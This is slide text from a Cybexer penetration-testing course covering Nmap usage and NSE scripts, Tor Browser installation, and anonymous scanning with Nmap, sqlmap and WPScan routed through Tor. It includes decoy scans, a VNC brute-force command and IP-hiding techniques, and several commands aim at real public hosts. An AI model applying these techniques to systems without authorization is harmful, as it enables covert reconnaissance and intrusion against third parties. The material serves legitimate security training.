NMAP

Nmap
What is Nmap?

Network MAPper - open-source tool for network

scanning
Nmap is very popular, powerful, free and well
documented utility
Good for IT auditing, asset discovery, security profiling
and penetration testing

www.cybexer.com 2
Nmap
What does NMAP do?

Sends raw IP packets to determine available hosts and

services
Helps to identify security holes

www.cybexer.com 3
Nmap
Brief history of Nmap

✓ September 1997 - 1st release of Nmap

✓ December 1998 - Nmap version 2.00 is publicly
released
✓ July 2007 - Zenmap graphical front-end released
✓ October 2020 - Nmap version 7.90 released

www.cybexer.com 4
Nmap
Full Nmap package contains several additional tools

Zenmap - advanced GUI (Linux, Windows, Mac OS)

Ncat - data transfer, redirection, and debugging tool
Ndiff - scan results comparing utility
Nping - packet generation and response analysis tool

www.cybexer.com 5
Nmap
Build your own Nmap

• download
• compile
• verify
• run

www.cybexer.com 6
Nmap
Download latest release from nmap.org with 'wget'

• cd /opt
• wget https://nmap.org/dist/nmap-7.92.tar.bz2

www.cybexer.com 7
Nmap
To save downloaded file with different filename use
'-O' option
• wget https://nmap.org/dist/nmap-7.92.tar.bz2 -O
/opt/nmap-custom.tar.bz2

www.cybexer.com 8
Nmap
In case if 'wget' is missing on your system, use 'curl'
command to get Nmap source code

• cd /opt
• curl https://nmap.org/dist/nmap-7.92.tar.bz2 -o
nmap-7.92.tar.bz2

www.cybexer.com 9
Nmap
Extract downloaded Nmap archive
• tar -jvxf nmap-7.92.tar.bz2

Keep in mind, that archive will be extracted to current

folder

www.cybexer.com 10
Nmap
Extract archive to different folder

• tar -jvxf nmap-7.92.tar.bz2 -C /tmp/

To make extraction silent, remove 'v' option

www.cybexer.com 11
Nmap
Configure Nmap

• cd nmap-7.92/
• ./configure --help

www.cybexer.com 12
Nmap
Configure Nmap
• ./configure --prefix=/opt/nmap

If '--prefix=<path>' is not defined, then default

installation will be done to '/usr/local' folder

www.cybexer.com 13
Nmap
Configure Nmap

Verify output of './configure' command

If some required options needed, but Nmap is not
compiling with their support, then additional libraries
must be installed (apt-get install libssl1.0-dev)

www.cybexer.com 14
Nmap
Clean up from previous './configure' command
• make clean

www.cybexer.com 15
Nmap
After missing libraries are installed, re-run './configure'
command
• ./configure --prefix=/opt/nmap

www.cybexer.com 16
Nmap
Build Nmap

• make

www.cybexer.com 17
Nmap
Verify, that after 'make' command no errors are
displayed (some warnings may occur)

www.cybexer.com 18
Nmap
If 'make' finishes without errors, proceed with
installation of Nmap
• make install

Root privileges are required during "make install"

phase.

www.cybexer.com 19
Nmap
Check output of 'make install' command
If all went well, you should see the following text
"NMAP SUCCEFFULLY INSTALLED"

www.cybexer.com 20
Nmap
Verify newly installed Nmap

• /opt/nmap/bin/nmap -V

www.cybexer.com 21
Nmap
Since Nmap installed in new/custom location, $PATH
environment should be adjusted

• echo $PATH

www.cybexer.com 22
Nmap
Since Nmap installed in new/custom location, $PATH
environment should be adjusted

• export PATH=/opt/nmap/bin:$PATH
• echo $PATH

www.cybexer.com 23
Nmap
Let's start scanning

www.cybexer.com 24
Nmap
Running Nmap without any arguments will show basic
usage options

• nmap

www.cybexer.com 25
Nmap
Basic scanning with Nmap
Everything on the Nmap command-line that isn't an
option (or option argument) is treated as a target host
specification
Scan single IP address
• nmap 127.0.0.1

www.cybexer.com 26
Nmap
Basic scanning
Scan multiple targets
• nmap 127.0.0.1 10.21.32.5

Note! Change 2nd and 3rd octets to correct ones!

www.cybexer.com 27
Nmap
Basic scanning
Scan targets with CIDR-style addressing
• nmap 10.XX.32.5/24

"/24" CIDR notation will scan 256 hosts starting from

10.XX.32.0 and ending with 10.XX.32.255

www.cybexer.com 28
Nmap
Basic scanning

Scan range of targets

• nmap 10.XX.32.100-105

www.cybexer.com 29
Nmap
Basic scanning
Ranges can be specified for any network octets
• nmap 192.168.113-114,205.100-102,177
This target range will scan following hosts
192.168.113.100, 192.168.113.101, 192.168.113.102,
192.168.113.177, 192.168.114.100, 192.168.114.101,
192.168.114.102, 192.168.114.177, 192.168.205.100,
192.168.205.101, 192.168.205.102 and
192.168.205.177

www.cybexer.com 30
Nmap
Basic scanning
List Scan (-sL) - only shows list of targets without
performing any scans. Ideal to generate host lists
• nmap -sL 192.168.113-114,205.100-102,177

www.cybexer.com 31
Nmap
Basic Scanning

Scan targets specified in the file. Target entries may be

any of the formats accepted by Nmap on command line
(IP address, hostname, CIDR, IPv6 etc)
Each entry must be separated by one or more spaces,
tabs, or newlines

www.cybexer.com 32
Nmap
Basic Scanning

Sample content of the target list file

www.cybexer.com 33
Nmap
Basic Scanning

Scan target list from the file

• nmap -iL hosts.txt

www.cybexer.com 34
Nmap
Basic Scanning

Excluding targets from the scan

• nmap --exclude 10.10.10.11 10.10.10.0/28

Multiple exclude targets are allowed (must be comma-

separated)
--exclude 10.10.10.11,editor.cnn.com,10.11.12.90/30

www.cybexer.com 35
Nmap
Basic Scanning

Excluding targets using a list file

• nmap --excludefile excluded.txt 10.10.10.0/24

'excluded.txt' must contain IP address/es, hostname/s

or CIDR's of excluded targets
Each entry must be separated by one or more spaces,
tabs, or newlines

www.cybexer.com 36
Nmap
Basic Scanning
Scan IPv6 targets
• nmap -6 fd03:c01:XX:32::2

To scan IPv6 address, both, source and target hosts

must be configured for IPv6

www.cybexer.com 37
Nmap
Basic Scanning

Scanning of IPv6 targets supports same options as IPv4

targets:
--exclude
--excludefile

www.cybexer.com 38
Nmap
Basic Scanning
Do not run DNS lookups for scanned targets
• nmap -n srv.studentXX.csirt.crp

Since DNS resolving can be slow, using '-n' may speed-

up scanning time

www.cybexer.com 39
Nmap
Basic Scanning
Use custom DNS servers for DNS resolution
• nmap --dns-servers 10.103.176.2 files.csirt.crp

Note! Check your DNS server IP from /etc/resolv.conf

www.cybexer.com 40
Nmap
Basic Scanning
By default, Nmap scans only first IP address of resolved
hostname. For example, running "nmap cnn.com" will
scan only first resolved IP address - 151.101.65.67

To can all IP addresses, use '-R' option

• nmap -R cnn.com

www.cybexer.com 41
Nmap
Basic Scanning

By default (without any port options), Nmap scans

1000 default ports for each protocol.
To scan specific port, use '-p <port_number>'
• nmap -p 80 files.csirt.crp

www.cybexer.com 42
Nmap
Basic Scanning
Different ports can be comma-separated
• nmap -p 80,443,8080 files.csirt.crp

Or port ranges can be separated with hyphen

• nmap -p 70-100,200-250,1000-1024 files.csirt.crp

www.cybexer.com 43
Nmap
Basic Scanning
Excluding port numbers from scanning
• nmap --exclude-ports 22 files.csirt.crp

Multiple ports and port ranges can be also used

• nmap --exclude-ports 22,70-80,443 files.csirt.crp

www.cybexer.com 44
Nmap
Basic Scanning
To scan all port use '-p-' option
• nmap -p- srv.studentXX.csirt.crp

If you forget the maximum number of ports, then you can

always calculate it using the formula: 216 - 1

www.cybexer.com 45
Nmap
Basic Scanning
Specifying particular protocol for particular port
• nmap -sSU -p U:53,111,161,T:21-25,80,139,8080
srv.studentXX.csirt.crp

This scanning option will scan UDP ports 53, 111,and

161. And TCP ports 21 to 25, 80, 139 and 8080.

www.cybexer.com 46
Nmap
Basic Scanning
By default, Nmap scans ports in random order. If
sequential port scanning is needed (e.g., IDS/IPS or
firewall testing), then '-r' option must be specified
• nmap -r -p 100-200 srv.studentXX.csirt.crp

'-r' option sorts ports from lowest to highest

www.cybexer.com 47
Nmap
Basic Scanning
Scan 'most popular' ports on the targets. Number '10'
stands for number of top ports to be scanned
• nmap --top-ports 10 srv.studentXX.csirt.crp

Nmap uses its own database of port popularity

(/usr/share/nmap/nmap-services).
'--top-ports' option is very useful for initial scans and large-
scale scans.
'--top-ports' option can be combined with '--exclude-ports'
option

www.cybexer.com 48
Nmap
Basic Scanning
Depends on the scan types and options, sometimes it's
reasonable to run fast scan against the targets
'-F' options scans 100 top ports
• nmap -F srv.studentXX.csirt.crp

www.cybexer.com 49
Nmap
Basic Scanning
During default scanning, Nmap will display open,
filtered and closed ports

If you want to display only 'open' ports, then option '--

open' should be used
• nmap -sS -Pn -n --open 10.XX.32.5

www.cybexer.com 50
Nmap
Basic Scanning
Definition of port states
'open' - an application on the target machine is
listening for connections/packets on that port
'filtered' - a firewall, filter, or other network obstacle is
blocking the port so that Nmap cannot tell whether it is
open or closed
'closed' - no application listening on them, though they
could open up at any time

www.cybexer.com 51
Nmap
To detect OS (Operating System) of the target, Nmap
uses TCP/IP stack fingerprinting.
Nmap sends a series of TCP and UDP packets to the
remote host and examines practically every bit in the
responses.
After performing dozens of tests such as TCP ISN
sampling, TCP options support and ordering, IP ID
sampling, and the initial window size check, Nmap
compares the results to its nmap-os-db database of
more than 2600 known OS fingerprints and prints out
the OS details if there is a match.
www.cybexer.com 52
Nmap
Detecting OS (Operating System)
• nmap -O srv.studentXX.csirt.crp

www.cybexer.com 53
Nmap
Aggressive scan
• nmap -A srv.studentXX.csirt.crp

www.cybexer.com 54
Nmap
Aggressive scan gives much more information about
scanned targets and running services, comparing to
default scan, but it is also more time consuming.
Aggressive scan tries to detect OS (-O), versions of
detected services (-sV), script scanning (-sC) and
traceroute information.
Aggressive scan also is more intrusive than default
scan, since Nmap runs more checks of the target.

www.cybexer.com 55
Nmap
By default, without any scanning options, Nmap runs
TCP SYN scan. Parameter '-sS' stands for SYN scan
• nmap -sS 127.0.0.1

Note! Syn scan requires 'root' privileges.

www.cybexer.com 56
Nmap
TCP SYN scan is most preferred scanning technique.

It can be performed quickly, scanning thousands of

ports per second on a fast network not hampered by
restrictive firewalls.

It is also relatively unobtrusive and stealthy since it

never completes TCP connections.

www.cybexer.com 57
Nmap
To perform TCP Connect scan use '-sT' option
• nmap -sT 127.0.0.1

Note! TCP Connect scan can be run as unprivileged user

www.cybexer.com 58
Nmap
By default, Nmap scans for TCP services. To check UDP
services running on targets hosts use '-sU' option
• nmap -sU 127.0.0.1

www.cybexer.com 59
Nmap
Since UDP and TCP are completely different protocols,
be careful when scanning large UDP port ranges.
It's highly preferable to run UDP scans against specific,
most used ports or limit number of UDP ports with '--
top-ports 10' option
• nmap -sU --top-ports 10 10.XX.32.5

www.cybexer.com 60
Nmap
Nmap allows to combine scanning of TCP and UDP
ports. Options '-sT' and '-sU' must be used. You can add
any other options described above.

• nmap -sT -sU 127.0.0.1

www.cybexer.com 61
Nmap
For different purposes Nmap allows to set fine-grained
timing controls. Timing options are defined with '-T'
flag followed by numbers from 0 to 5

-T0 - paranoid mode, 1 probe sent every 5 minutes

-T1 - sneaky mode, 15 seconds between each probe

-T2 - polite mode, 0.4 seconds between each probe

www.cybexer.com 62
Nmap
For different purposes Nmap allows to set fine-grained
timing controls. Timing options are defined with '-T' flag
followed by numbers from 0 to 5

-T3 - normal mode, this is default scanning setting. It runs in

parallel mode

-T4 - aggressive mode, runs with smaller timeouts and

retries

-T5 - insane mode, runs even with smaller timeouts and

retries than '-T4' mode

www.cybexer.com 63
Nmap
Nmap allows to combine scanning of TCP and UDP
ports. Options '-sT' and '-sU' must be used. You can add
any other options described above.
• nmap -sS -T1 -p 22 127.0.0.1

www.cybexer.com 64
Nmap
Compare -T1 and -T2 scanning times
• nmap -sS -T2 -p 22 127.0.0.1

www.cybexer.com 65
Nmap
It is important to save Nmap port scanning results.
There're many good reasons to do that

- stay stealthy (avoid scanning many times)

- compare different Nmap scan results
- share with other team members
- import scan results into other tools and applications

www.cybexer.com 66
Nmap
Nmap scan results have 5 different formats
- interactive output (default stdout/screen output)
- normal output, saves interactive output to the file
- XML output, saves Nmap scan results to the file in
XML format
- grepable output, saves Nmap scan results to the file,
which can be searched and parsed with standard
Linux tools such as grep, awk, sed etc.
- script kiddie output, saves Nmap scan results to the
file written in 'hackers' language

www.cybexer.com 67
Nmap
Save Nmap scan results to the file
• nmap -oN output.txt 10.XX.32.5

After scan, 'output.txt' file with scan results will be

created in current folder

www.cybexer.com 68
Nmap
Save Nmap scan results to the file
• nmap -oG outputg.txt 10.XX.32.5

After scan, 'outputg.txt' file with scan results will be

created in current folder

www.cybexer.com 69
Nmap
Save Nmap scan results to the file
• nmap -oX output.xml 10.XX.32.5

After scan, 'output.xml' file with scan results will be

created in current folder. File format is XML

www.cybexer.com 70
Nmap
Save Nmap scan results to the file
• nmap -oS outputs.txt 10.XX.32.5

After scan, 'outputs.txt' file with scan results will be

created in current folder

www.cybexer.com 71
Nmap
Sometimes there's a need to save Nmap scan results in
different formats. Instead of specifying different '-o'
options, it is possible to save output in all formats
(except script kiddies format)
• nmap -oA scan01 10.XX.32.5

www.cybexer.com 72
Nmap
Option '-oA scan01' means, that after Nmap finishes
scanning, 3 different output files with scanning results
will be created and prefix for the files will be 'scan01'.
.gnmap extension is for 'grepable' file format
.nmap extension is for default file format
.xml extension is for XML file format
• ls -la scan01.*

www.cybexer.com 73
Nmap
XML output is one of the most important output types,
as it can be converted to HTML, easily parsed by
programs such as Nmap graphical user interfaces or
imported into databases or applications.

www.cybexer.com 74
Nmap
Let's convert Nmap XML output file to HTML file
We use xsltproc command, which is command line XSLT
processor
• xsltproc scan01.xml -o
/var/www/html/scan01.html

Start Apache web server on your Kali Linux

• service apache2 start

www.cybexer.com 75
Nmap
Open created HTML page in web browser
http://10.XX.32.2/scan01.html

www.cybexer.com 76
Nmap
By default, during scan Nmap is not showing any
progress. During scan, by pressing 'space' or 'enter'
keys you can see progress of the scan

www.cybexer.com 77
Nmap
To display periodically scanning statistics you can use '--
stats-every' options followed by number, which defines
interval of status update
• nmap --stats-every 10s 10.XX.32.2/24

www.cybexer.com 78
Nmap
If you need to identify hosts which are online, but without
actual port scanning, then Nmap can be run in 'ping-sweep'
mode
• nmap -sn 10.XX.32.0/24

Older versions of Nmap has option '-sP'

www.cybexer.com 79
Nmap
Depends on the network setup, firewalls may be blocking
ICMP requests. If it happens, then Nmap will not do port
scan if target is not pingable. To disable 'ping scan', but run
port scan on all targets use '-Pn' options
• nmap -Pn 192.168.113.1

This type of scan helps to avoid firewalls, which block ICMP

probes
Older versions of Nmap use '-P0' options, to disable ping
requests

www.cybexer.com 80
Nmap - NSE scripts
Advanced Nmap usage with NSE scripts

NSE - Nmap scripting engine

NSE offers very powerful and flexible features. It allows

users to write (and share) simple scripts using the Lua
programming language.
NSE scripts allow to automate a wide variety of
networking tasks.

www.cybexer.com 81
Nmap - NSE scripts
To get HTTP title page information
• nmap -n -sS --script http-title --open -p 443
edition.cnn.com

www.cybexer.com 82
Nmap - NSE scripts
Nmap scripts default location is in
'/usr/share/nmap/scripts' folder. There're over 600
different scripts
• ls -la /usr/share/nmap/scripts/

www.cybexer.com 83
Nmap - NSE scripts
Let's review 'http-title' NSE script
• less /usr/share/nmap/scripts/http-title.nse

www.cybexer.com 84
Nmap - NSE scripts
When Nmap runs 'http-title' script, it sends HTTP GET
request to the target server.
Target host and port must be defined.
Response from the server is saved to 'resp' variable

www.cybexer.com 85
Nmap - NSE scripts
If HTTP server responds with HTTP redirect status
codes 30X, then HTTP title will be set to "Did not follow
redirect to ...."

• nmap -n -sS --script http-title --open -p 80

edition.cnn.com

www.cybexer.com 86
Nmap - NSE scripts
If HTTP response does not have HTTP Body content,
then script execution will end

www.cybexer.com 87
Nmap - NSE scripts
If HTTP response does have HTTP Body content, scripts
will be searching for HTML tag '<title>'.
Since '<title>' tag can be written in different cases
(Title, TITLE, tITLE etc.), then Regular Expression is used

If HTTP body matches regular expression, then

everything between '<title>' and '</title>' tags is saved
to variable 'title'

www.cybexer.com 88
Nmap - NSE scripts
If HTML title variable length is over 65 characters, then
rest of 'Title' value is removed and '...' appended

www.cybexer.com 89
Nmap - NSE scripts
Once 'http-title' script finishes its execution, HTTP 'title'
will be returned to Nmap's output (shown in Nmap
scan results)

www.cybexer.com 90
Nmap - NSE scripts
HTTP protocol is one of the most popular protocols in
use today. Nmap has large number of NSE scripts,
which allows to do complex scanning of web servers.

www.cybexer.com 91
Nmap - NSE scripts
Scanning for supported HTTP methods
• nmap -p80 --script http-methods 10.XX.32.5

www.cybexer.com 92
Nmap - NSE scripts
Discover interesting files and folders in web server
• nmap -p80 --script http-enum 10.XX.32.5

www.cybexer.com 93
Nmap - NSE scripts
Let's try some other NSE scripts
'whois-domain' script will query WHOIS server and
display information about scanned domain
• nmap --script whois-domain cnn.com

www.cybexer.com 94
Nmap - NSE scripts
Let's try some other NSE scripts
'smb-enum-shares' script will attempt to list remote
shares on target server.
For many NSE scripts it is advised to narrow down scan
to specific ports. In case of remote shares, we will use
port 445
• nmap -sS -Pn -n -p 445 --script smb-enum-shares
10.XX.32.5

www.cybexer.com 95
Nmap - NSE scripts
Result of remote share scan

www.cybexer.com 96
Nmap - NSE scripts
Let's try some other NSE scripts
Nmap allows to combine several NSE scripts
• nmap --script ssl-cert,ssl-enum-ciphers -p 443
edition.cnn.com

www.cybexer.com 97
Nmap - NSE scripts
In this example 'ssl-cert' NSE script will show
information about SSL/TLS certificate of the target - CN,
Issuer, certificate validity period, SAN records and other
certificate information

'ssl-enum-ciphers' will try to enumerate different

SSL/TLS ciphers and output the information

www.cybexer.com 98
Nmap - NSE scripts
Let's try some other NSE scripts
Some NSE scripts allow to brute-force services for
different usernames and/or passwords
• nmap --script vnc-brute -p 5901 10.XX.32.2

To see fill list of brute-force scripts, run following

command in terminal
• ls -al /usr/share/nmap/scripts/*brute*

www.cybexer.com 99
Nmap - NSE scripts
Nmap allows to combine NSE scripts with same prefix.
For example, there're many scripts with 'http-' prefix:
http-google-malware
http-php-version
http-sql-injection
http-wordpress-users

www.cybexer.com 100
Nmap - NSE scripts
To run all HTTP scripts against the target, use 'http-*'
for script option

• nmap -p80 --script "http-*" 10.XX.32.5

Note! Be careful when using many scripts, it will

generate 'A LOT' of traffic, will run much longer and in
some cases, it can do denial of service for the target

www.cybexer.com 101
Nmap - NSE scripts
NSE scripts has different categories. Some scripts
considered as intrusive, where some scripts are pretty safe
to run against the target systems
Run all nonintrusive scripts
• nmap --script "not intrusive" 10.XX.32.5
Run safe scripts
• nmap --script "safe" 10.XX.32.5
You can make very granular combination of NSE scripts
• nmap --script "(default or safe or intrusive) and not
http-*" 10.XX.32.5

www.cybexer.com 102
Nmap - NSE scripts
Nmap allows to run decoy scan against the targets.
Nmap makes it appear to the remote host that the
host(s) you specify as decoys are scanning the target
network too.
It is generally very effective technique for hiding your IP
address.
• nmap -sS -Pn -n -
D192.168.1.1,192.168.2.2,10.10.10.10 10.XX.32.5

www.cybexer.com 103
Nmap - NSE scripts
Sometimes you have to compare different scan results,
to see what services and/or hosts appeared or
removed between scans
ndiff - utility to compare the results of Nmap scans
Install 'ndiff' tool on Kali linus
• apt-get install ndiff

www.cybexer.com 104
Nmap - NSE scripts
Ndiff application takes two Nmap XML output files and
prints the differences between them.
The differences observed are

· Host states (e.g. up to down)

· Port states (e.g. open to closed)
· Service versions (from -sV)
· OS matches (from -O)
· Script output

www.cybexer.com 105
Nmap - NSE scripts
Let's compare two Nmap scan results
• ndiff scan1.xml scan2.xml

To see more detailed comparison, use '-v' options

• ndiff -v scan1.xml scan2.xml

www.cybexer.com 106
Tor Browser
Tor Browser - installation
Tor Browser – is a web-browser using the Tor network.
It has some extra features to enhance your anonymity
and privacy.

The Tor network itself is designed to hide your original

IP address. It is also encrypting Internet traffic sending
from and to your computer.

www.cybexer.com 108
Tor Browser - installation
All in all, Tor Browser:

• hides your IP
• does not save any account information (logins and
passwords)
• does not save your web history
• has some extra tools to protect you from reveal

www.cybexer.com 109
Tor Browser - installation
Tor Browser is now present in Kali Linux repository, but
we will go through installation procedure step-by-step.

As with most of the software for Linux, there're several

ways how to download and/or install it.

First way is to visit TOR's official site

'https://www.torproject.org' and download needed
version.

www.cybexer.com 110
Tor Browser - installation
Here's the command, that will download latest version of
Tor Browser archive, extract all files from that archive, then
move extracted content to '/root/tor/' folder and finally
remove downloaded Tor Browser archive
• temp="$(curl -s
https://www.torproject.org/download/languages/)"
&& temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-
]+_ALL.tar.xz' | tail -n 1` && wget -O tor-browser-
linux64.tar.xz "https://www.torproject.org$temp2" &&
tar xvfJ tor-browser-linux64.tar.xz && rm -f tor-
browser-linux64.tar.xz && mv tor-browser*/Browser/
~/tor && rm -rf tor-browser*

www.cybexer.com 111
Tor Browser - installation
Let's take the whole command to pieces and see how it
works and what it does. As you have noticed, there several
places with '&&'
• temp="$(curl -s
https://www.torproject.org/download/languages/)"
&& temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-
]+_en-US.tar.xz' | tail -n 1` && wget -O tor-browser-
linux64.tar.xz "https://www.torproject.org$temp2" &&
tar xvfJ tor-browser-linux64.tar.xz && rm -f tor-
browser-linux64.tar.xz && mv tor-browser*/Browser/
~/tor && rm -rf tor-browser*

www.cybexer.com 112
Tor Browser - installation
Double ampersand (&) in Linux OS separates different commands. The
command after '&&' is executed only if previous command did not
finish with errors. So, we have following 7 commands
1. temp="$(curl -s
https://www.torproject.org/download/languages/)"
2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_en-
US.tar.xz' | tail -n 1`
3. wget -O tor-browser-linux64.tar.xz
"https://www.torproject.org$temp2"
4. tar xvfJ tor-browser-linux64.tar.xz
5. rm -f tor-browser-linux64.tar.xz
6. mv tor-browser*/Browser/ ~/tor
7. rm -rf tor-browser*

www.cybexer.com 113
Tor Browser - installation
Let's review all commands one by one.
First command will fetch content from
'https://www.torproject.org/download/languages/'
page using 'curl' program and store result in 'temp'
variable
1. temp="$(curl -s
https://www.torproject.org/download/languages/
)"

www.cybexer.com 114
Tor Browser - installation
Second command will print (echo) content of 'temp'
variable from first command, then will search for alpha-
numeric text ending with '_en-US.tar.xz' and from that
results only last line will be chosen and set to variable
'temp2'
2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-
]+_en-US.tar.xz' | tail -n 1`

www.cybexer.com 115
Tor Browser - installation
Before going further, lets run first and seconds
commands and see what will be the result
• temp="$(curl -s
https://www.torproject.org/download/languages/)
" && temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-
9/_.-]+_en-US.tar.xz' | tail -n 1`
Since output of two commands is set to variable
'temp2', we will not see anything in output. To see
value of 'temp2' variable, type following command
• echo $temp2

www.cybexer.com 116
Tor Browser - installation
From 1st and 2nd commands we have variable 'temp2'.
This variable is used in 3rd command, which will
download Tor Browser and save file as 'tor-browser-
linux64.tar.xz'
3. wget -O tor-browser-linux64.tar.xz
"https://www.torproject.org$temp2"

www.cybexer.com 117
Tor Browser - installation
After running first 3 commands, in our current folder
we must have downloaded Tor Browser archive. Let's
check the content of current folder
• ls -la

If you have file 'tor-browser-linux64.tar.xz' in current

folder, then execution of first three commands was
successful.

www.cybexer.com 118
Tor Browser - installation
4th command will extract content of downloaded
archive into current folder
4. tar xvfJ tor-browser-linux64.tar.xz

Note. If you want to minimize screen output during

extraction, then remove 'v' option from command.

www.cybexer.com 119
Tor Browser - installation
5th command will remove downloaded Tor Browser
archive from current folder. '-f' option will not prompt
for file deletion

5. rm -f tor-browser-linux64.tar.xz

www.cybexer.com 120
Tor Browser - installation
6th command will move all content Tor Browser folder
to new location 'tor' in user's home folder

6. mv tor-browser*/Browser/ ~/tor

www.cybexer.com 121
Tor Browser - installation
The final, 7th command will clean-up 'leftovers' from Tor
Browser archive extraction

7. rm -rf tor-browser*

www.cybexer.com 122
Tor Browser - usage
Before using the Tor Browser, it is reasonable to verify
installation location and permissions of files and folder
• ls -la ~/tor/

www.cybexer.com 123
Tor Browser - usage
Latest Tor Browser will not run in 'root' user
permissions. We have to do small adjustments to Tor
launcher file "~/tor/start-tor-browser". Comment out
following code:

Result of changes

www.cybexer.com 124
Tor Browser - usage
Since the Tor Browser is a graphical program, it must be
executed from graphical environment.
Open in VNC viewer 10.XX.32.2:5901

Open Kali Linux terminal and execute following

program

• ~/tor/start-tor-browser

www.cybexer.com 125
Tor Browser - usage
If you see following screen, then click on 'Connect'
button to start using the Tor Browser

www.cybexer.com 126
Tor Browser - usage
If you run the Tor Browser for the first time, then
required configuration will be loaded

www.cybexer.com 127
Tor Browser - usage
To verify, that Tor Browser
is working properly, open
'ipleak.net' site.

If you see not your

external IP address, then
Tor Browser is working
properly.

www.cybexer.com 128
Tor Browser - usage
Congratulations!

By using Kali Linux command line, you have

downloaded latest version of the Tor Browser, extracted
the archive, moved to custom location and cleaned up
files and folder after download.

You have successfully installed Tor Browser.

www.cybexer.com 129
Anonymous scanning through Tor
Anonymity is a very complex problem that not be
solved in a single document. Before starting real action,
you must double-check everything in the laboratory
environment.

In this course, we will learn you how hide your real IP

address while scanning by Nmap, sqlmap or WPScan.
We will use Tor to route Nmap, sqlmap or WPScan
traffic.

www.cybexer.com 130
Anonymous scanning through Tor
Let's install 'Tor' in Kali Linux. In terminal window type
in following command
• apt-get -y install torsocks tor

www.cybexer.com 131
Anonymous scanning through Tor
Main 'Tor' configuration file located here
'/etc/tor/torrc'. For proper anonymity we have to add
new 3 configuration options:
AutomapHostsOnResolve - mapping of unused virtual
addresses
DNSPort - port for DNS UDP requests
TransPort - port for transparent proxy connections

www.cybexer.com 132
Anonymous scanning through Tor
Let's append new options to 'Tor' configuration file
• echo 'AutomapHostsOnResolve 1' >> /etc/tor/torrc
• echo 'DNSPort 53530' >> /etc/tor/torrc
• echo 'TransPort 9040' >> /etc/tor/torrc

www.cybexer.com 133
Anonymous scanning through Tor
Verify configuration changes with 'tail' command. Since
we appended new options at the end of file, we can
print only 10 last lines
• tail -n10 /etc/tor/torrc

www.cybexer.com 134
Anonymous scanning through Tor
Now we have to enable 'Tor' process auto-startup
• systemctl enable tor

And finally, let's start main 'Tor' process

• systemctl start tor

www.cybexer.com 135
Anonymous scanning through Tor
After 'Tor' start-up, it is advised to verify, that 'Tor' is
running. Check 'tor' network connections with 'netstat'
command
• netstat -tulpna |grep tor

www.cybexer.com 136
Anonymous scanning through Tor
Or you can check status of Tor with 'systemctl'
command
• systemctl status tor

www.cybexer.com 137
Anonymous scanning through Tor
Now when we have 'Tor' service running we can check
if it works properly with 'ProxyChains-NG' program.

'ProxyChains-NG' is a software, which redirects

connections through socks/http proxies.

The usage is pretty straightforward - add 'proxychains4'

before desired command, to redirect traffic through the
'Tor' network.

www.cybexer.com 138
Anonymous scanning through Tor
Let's check our external IP address
• curl ipinfo.io

www.cybexer.com 139
Anonymous scanning through Tor
Let's install 'proxychains4' from Kali Linux repository
• apt-get -y install proxychains4

www.cybexer.com 140
Anonymous scanning through Tor
Now, let's check our external IP address through 'Tor'
network
• proxychains4 curl ipinfo.io

www.cybexer.com 141
Anonymous scanning through Tor
As you see, 'Proxychains4' generates a lot of exceeded
information. Try the following construction to suppress the
unnecessary output
• proxychains4 curl ipinfo.io 2>/dev/null

Or use '-q' options

• proxychains4 -q curl ipinfo.io

www.cybexer.com 142
Anonymous scanning through Tor
By default, 'Tor' randomly selects entry node,
intermediate node(s) and exit node.
After each 'Tor' service restart new nodes selected.
To limit 'Tor' exit nodes to specific country, add
following line to configuration file
• echo 'ExitNodes {se}, {nl}, {ch}, {fr}' >>
/etc/tor/torrc
And restart 'Tor' service
• service tor restart

www.cybexer.com 143
Anonymous scanning through Tor
Now, check your external IP address again
• proxychains4 curl ipinfo.io 2>/dev/null

You can test more, by restarting 'Tor' service and

running 'proxychain4' command again

www.cybexer.com 144
Anonymous scanning through Tor
There're might be situations, when you want
completely disable some countries from 'Tor' chain.
To do that, use 'ExcludeNodes' option followed by
country codes, which will be excluded
• echo 'ExcludeNodes {ru}, {by}, {cn}, {ua}' >>
/etc/tor/torrc

After all configuration changes, you must restart 'Tor'

service

www.cybexer.com 145
Anonymous scanning through Tor
For scanning with 'Nmap' through 'Tor' network you
have to be very cautious.
If you run 'Syn-Scan' against the target, your real IP
address will be leaked.
Let's see what will happen when we run 'nmap' with '-
sS' option.

www.cybexer.com 146
Anonymous scanning through Tor
Open new Kali Linux terminal and start network packet
capture
• tcpdump -n -i eth0 -s0 host 94.154.144.4 and port
443

www.cybexer.com 147
Anonymous scanning through Tor
On machine where we initiate port scanning, we run
'proxychains4' with 'nmap' and set 'syn-scan' option
• proxychains4 nmap -sS -PN -sV --open -n -p 443
94.154.144.4 2>/dev/null

www.cybexer.com 148
Anonymous scanning through Tor
Now, let's check 'tcpdump' output.
We can clearly see, that our attacking machine's IP
address was revealed

www.cybexer.com 149
Anonymous scanning through Tor
Next, we run 'nmap' with 'connect-scan', by using '-sT'
option
• proxychains4 nmap -sT -PN -sV --open -n -p 443
94.154.144.4 2>/dev/null

www.cybexer.com 150
Anonymous scanning through Tor
Running 'nmap' with '-sT' option did not reveal
attacking machine's external IP address.

www.cybexer.com 151
Anonymous scanning through Tor
If you run 'nmap' through 'proxychains4 against the
hostname, not IP address of target, then you might see
an error 'nmap: netutil.cc:1319: int
collect_dnet_interfaces(const intf_entry*, void*):
Assertion `rc == 0' failed.'
• proxychains4 nmap -sT -PN -sV -v -A -T4 -p 80
cnn.com

www.cybexer.com 152
Anonymous scanning through Tor
To fix that problem, there are two options
- scan IP address, but not hostname
- or comment out 'proxy_dns' option in
'/etc/proxychains4.conf' file
• sed -i 's/^proxy_dns/#proxy_dns/g'
/etc/proxychains4.conf

www.cybexer.com 153
Anonymous scanning through Tor
'sqlmap' anonymous scanning through 'Tor' network.

'sqlmap' has the --proxy option, therefore you just

need to append --proxy socks5://127.0.0.1:9050 to
you command

• sqlmap -u TARGET --proxy socks5://127.0.0.1:9050

www.cybexer.com 154
Anonymous scanning through Tor
'WPScan' anonymous scanning through Tor network.

WPScan has the similar --proxy flag, so just append --

proxy socks5://127.0.0.1:9050 to your normal
command
• wpscan -u TARGET -e p,vt,u --proxy
socks5://127.0.0.1:9050
Note. If you have significant delays in scanning, it's
recommended to use --request-timeout 500 --connect-
timeout 120 options

www.cybexer.com 155
DIRB, NIKTO, GOBUSTER
DIRB - overview
DIRB is a Web Content Scanner. It looks for existing
